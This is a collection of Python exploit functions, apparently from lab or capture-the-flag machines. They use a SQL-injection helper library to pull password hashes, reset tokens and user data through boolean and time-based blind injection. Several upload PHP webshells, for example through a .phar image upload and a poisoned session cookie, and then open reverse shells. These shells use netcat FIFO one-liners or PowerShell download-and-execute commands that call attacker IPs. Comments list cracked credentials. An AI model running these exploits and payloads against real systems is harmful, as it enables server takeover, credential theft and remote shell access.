Example #1
0
def pwn():
    # curl 'http://10.10.10.121:3000/GRAPHQL?query=query%7buser%7b%20username%20password%7d%7d'
    # [email protected]:godhelpmeplz
    # sqli in view_tickets_controller.php
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=boolPredicate,
                     requestPath='req-view.txt')

    # qry = 'select @@version' # 5.7.24-0ubuntu0.16.04.1
    # r = ya.boolExfiltrate(t, qry, 'mysql')

    # users, settings
    # qry = ya.templates['mysql']['select']['tables']
    # ['USER', 'CURRENT_CONNECTIONS', 'TOTAL_CONNECTIONS', 'id', 'salutation', 'fullname', 'email', 'password', 'timezone', 'status']
    # qry = ya.templates['mysql']['select']['columns'].format(table='users')
    # qry = 'select email from users'
    # qry = 'select password from users'
    # [email protected]:c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca
    # [email protected]:ec09fa0d0ba74336ea7fe392869adb198242f15a
    # qry = ya.templates['mysql']['select']['columns'].format(table='staff')
    # ['id', 'username', 'password', 'fullname', 'email', 'login', 'last_login', 'department', 'timezone', 'signature', 'newticket_notification', 'avatar', 'admin', 'status']
    # qry = 'select username from staff'
    qry = 'select password from staff'
    # admin:d318f44739dced66793b1a603028133a76ae680e:Welcome1

    r = ya.boolExfiltrateList(t, qry, 'mysql')
Example #2
0
def pwn():
    # t = ya.Transport(payloadProcessor=pPayload, responseProcessor=pResponse, requestPath='request.txt')
    # res = t.send(ya.templates['mssql']['select']['version']) # Microsoft SQL Server 2014 - 12.0.2269.0 (X64)
    # res = t.send(ya.templates['mssql']['select']['isShellEnabled']) # 1
    # res = t.send(ya.templates['mssql']['select']['user']) # web
    # res = t.send(ya.templates['mssql']['select']['database']) # web
    # print(res)

    # idx = 0
    # while True:
    #     # qry = ya.templates['mssql']['select']['tables'] # _logins, TEST1, TMPYU
    #     # qry = ya.templates['mssql']['select']['columns'].format(table='_logins') # _e, _l, _n, _p, _u, id
    #     # qry = ya.templates['mssql']['select']['columns'].format(table='TEST1') # ID, OUT
    #     # qry = ya.templates['mssql']['select']['columns'].format(table='TMPYU') # ID, OUT
    #     qry = 'SELECT _e FROM _logins' # [email protected]
    #     limit = ya.templates['mssql']['util']['limit'].format(count=1, offset=idx)
    #     res = t.send(f'{qry} {limit}')
    #     if res is None: break
    #     print(res)
    #     idx += 1

    # interactiveCli(rce)

    # REMEMBER: python -m http.server 80
    # p = subprocess.Popen('nc -lvp 443'.split(' '))
    # revshell = R"""c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString(''http://10.10.14.16/Invoke-PowerShellTcp.ps1'');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 443" """
    # rce(revshell)

    # p.communicate()

    # bool
    t = ya.Transport(payloadProcessor=pBoolPayload,
                     predicate=boolPredicate,
                     requestPath='req-verify.txt')
    ya.boolExfiltrate(t, 'SELECT @@version', 'mssql')
Example #3
0
def rce(cmd):
    t = ya.Transport(payloadProcessor=pPayload,
                     responseProcessor=boolPredicate,
                     requestPath='req-view.txt')
    t.payloadProcessor = pPayloadStacked
    ya.mssqlShell(t, cmd)
    t.payloadProcessor = pPayload
    ya.mssqlExfilShell(t)
Example #4
0
def pwn():
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=timePredicate,
                     requestPath='req-view.txt',
                     debug=True)
    s = t.client.session
    res = s.post('http://192.168.0.150/login/resetPassword.php',
                 data={'username': '******'})
    # qry = 'select @@version'
    # 5.7.33-0ubuntu0.18.04.1
    qry = 'select token from user where id_level = 1'
    # unaccessable_until_you_change_me, mJAL3qtMatNCDJ0
    newPwd = 'mypassword'
    token = ya.boolExfiltrate(t, qry, 'mysql', timeBasedDelay=1)
    data = {'token': token, 'password': newPwd}
    res = s.post('http://192.168.0.150/login/doChangePassword.php', data=data)
    if 'Oops!' in res.text:
        print('[-] error reseting password')
        exit(-1)
    print(f'[+] login = admin:{newPwd}')
    data = {'username': '******', 'password': newPwd}
    res = s.post('http://192.168.0.150/login/checkLogin.php', data=data)
    if 'Oops!' in res.text:
        print('[-] error login')
        exit(-1)
    print('[+] logged in')
    file = {
        'id': '2',
        'id_user': '******',
        'name': 'foo',
        'description': 'bar',
        'price': '1',
        'image':
        ('x.phar', "<?php system($_GET['cmd']); ?>", 'application/x-php')
    }
    res = s.post('http://192.168.0.150/item/updateItem.php', files=file)
    if 'Oops!' in res.text:
        print('[-] error uploading webshell')
        exit(-1)
    print('[+] webshell uploaded')
    ip = '192.168.0.102'
    port = 5555
    revshell = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {ip} {port} >/tmp/f'
    p = subprocess.Popen(f'nc -lvp {port}'.split(' '))
    res = s.get('http://192.168.0.150/item/image/x.phar',
                params={'cmd': revshell})
    p.communicate()
Example #5
0
def pwn():
    # t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req.login')
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=timePredicate,
                     requestPath='req.login')

    # qry = ya.templates['sqlite']['select']['version']
    # res = ya.boolExfiltrate(t, qry, 'sqlite')

    # qry = ya.templates['sqlite']['select']['tables']
    # ['users', 'notes', 'bookings', 'sessions']
    # qry = ya.templates['sqlite']['select']['columns'].replace('{table}', 'users')
    # ['CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT,active TINYINT(1))']
    # qry = "SELECT username FROM users"
    qry = "SELECT password FROM users"
    # RickA:fdc8cd4cff2c19e0d1022e78481ddf36 (nevergonnagiveyouup)

    # res = ya.boolExfiltrateList(t, qry, 'sqlite')
    res = ya.boolExfiltrateList(t, qry, 'sqlite', timeBasedDelay=2)

    print(res)
Example #6
0
def pwn():
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=boolPredicate,
                     requestPath='req.login')

    dbms = 'mysql'
    # qry = ya.templates[dbms]['select']['version']
    # 10.0.23-MariaDB
    # qry = ya.templates[dbms]['select']['user']
    # root@localhost
    # qry = ya.templates[dbms]['select']['database']
    # seattle
    # ya.boolExfiltrate(t, qry, dbms)
    # qry = ya.templates[dbms]['select']['tables']
    # ['tblBlogs', 'tblMembers', 'tblProducts']
    # qry = ya.templates[dbms]['select']['columns'].replace('{table}', 'tblMembers')
    # ['id', 'username', 'password', 'session', 'name', 'blog', 'admin']
    qry = 'SELECT password from tblMembers'
    # [email protected]:Assasin1

    res = ya.boolExfiltrateList(t, qry, dbms)
    print(res)
Example #7
0
def pwn():

    t = ya.Transport(
        payloadProcessor=pPayload,
        predicate=boolPredicate,
        requestPath='req-login.txt'
    )
    # qry = 'select @@version'
    # ya.boolExfiltrate(t, qry,'mysql')

    # q = ya.templates['mysql']['select']['tables']
    # users
    # q = ya.templates['mysql']['select']['columns'].format(table='users')
    # ID, username, password, role
    # q = 'SELECT password FROM users'
    # admin, chris
    # 0e462096931906507119562988736854, d4ee02a22fc872e36d9e3751ba72ddc8:juggling
    # ya.boolExfiltrateList(t, q, 'mysql')
    # admin:240610708

    # RUN FTP SERVER WITH shell.php
    # python3 -m pyftpdlib -p21 -w
    ftp = threading.Thread(target=ftpd)
    ftp.daemon = True
    ftp.start()
    s = t.client.session
    s.post('http://10.10.10.73/login.php', {'username':'******','password':'******'})
    res = s.post('http://10.10.10.73/upload.php', {'url':'http://10.10.14.9/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.gif'})
    hit = re.findall('/var/www/html/(.*?);', res.text)[0]
    l = subprocess.Popen('nc -lvp 5555', shell=True)
    params = {'cmd':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.9 5555 >/tmp/f'}
    try:
        s.get(f'http://10.10.10.73/{hit}/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php', params=params, timeout=0.0001)
    except requests.exceptions.ReadTimeout:
        pass
    l.communicate()    
Example #8
0
def pwn():
    t = ya.Transport(payloadProcessor=pPayload,
                     predicate=boolPredicate,
                     requestPath='req-user.txt')
    pTmp = partial('{guess}'.format)
    users = ya.boolExfiltrateList(t,
                                  pTmp,
                                  'nosql',
                                  searchChars=string.ascii_lowercase,
                                  exfilType=ya.BoolExfiltrateType.NOSQL)
    # users = ['admin', 'mango']
    for user in users:
        with open('req-pass.txt', 'r') as f:
            userFilled = f.read().replace('{user}', user)
            t.client = ya.HttpClient.parse(userFilled, debug=True)
            searchChars = ''.join(
                list(set(string.printable) - set(string.whitespace)))
            # pTmp = partial('PREFIX{guess}'.format)
            passwords = ya.boolExfiltrateList(
                t,
                pTmp,
                'nosql',
                searchChars=searchChars,
                exfilType=ya.BoolExfiltrateType.NOSQL)
Example #9
0
def boolPredicate(res):
    if 'very sorry' in res.text:
        return True
    else:
        return False


def pPayload(p):
    p = p.replace('SELECT ', '', 1)
    sqli = f'465\' union select case when ({p})=1 then "main" else "contact" end-- -'
    return sqli


t = ya.Transport(payloadProcessor=pPayload,
                 predicate=boolPredicate,
                 requestPath='req-index.txt',
                 useSsl=True)


def rce(cmd):
    t.client.session.cookies['webshell'] = '<?php system($_GET["cmd"]) ?>'
    res = t.client.session.get(
        'https://www.nestedflanders.htb/index.php?id=25')
    wsPath = f'/var/lib/php/sessions/sess_{res.cookies["PHPSESSID"]}'
    params = {
        'id': f'465\' union select "1\' union select \'{wsPath}\'-- -"-- -',
        'cmd': cmd
    }
    res = t.client.session.get('https://www.nestedflanders.htb/index.php',
                               params=params)
    print(res.text)